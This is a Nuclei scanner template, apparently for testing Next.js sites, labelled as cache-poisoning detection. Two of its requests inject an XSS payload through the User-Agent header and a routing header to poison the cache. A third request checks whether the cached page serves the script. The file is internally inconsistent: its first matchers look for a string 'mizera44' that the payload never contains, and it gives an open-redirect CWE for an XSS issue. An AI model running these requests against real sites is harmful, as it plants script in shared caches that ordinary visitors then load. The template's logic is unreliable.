id: cache-zhero

info:
  name: Cache Poisoning Detection
  author: xandsz
  severity: medium
  description: |
    Detecta possíveis vulnerabilidades de cache poisoning explorando cabeçalhos manipulados que podem impactar a resposta do servidor, verificando se a resposta é armazenada em cache.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  metadata:
    max-request: 3
  tags: cache, poisoning, fuzzer

http:
  # Primeira requisição com cabeçalhos manipulados
  - raw:
      - |
        GET /poc?__nextDataReq=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: CP TO SXSS ON NEXT.JS : <img src=x onerror=alert('Palestine')>
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Connection: keep-alive
        Upgrade-Insecure-Requests: 1
        Priority: u=0, i
        x-now-route-matches: 1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'mizera44'
      - type: word
        words:
          - "text/html"
        part: header
      - type: status
        status:
          - 200

  # Segunda requisição com cabeçalhos manipulados
  - raw:
      - |
        GET /poc?__nextDataReq=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: CP TO SXSS ON NEXT.JS : <img src=x onerror=alert('Palestine')>
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Connection: keep-alive
        Upgrade-Insecure-Requests: 1
        Priority: u=0, i
        x-now-route-matches: 1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'mizera44'
      - type: word
        words:
          - "text/html"
        part: header
      - type: status
        status:
          - 200

  # Terceira requisição com cabeçalhos manipulados, para verificar se o XSS é refletido do cache
  - raw:
      - |
        GET /poc HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "('Palestine')>"
      - type: word
        words:
          - "text/html"
        part: header
      - type: status
        status:
          - 200
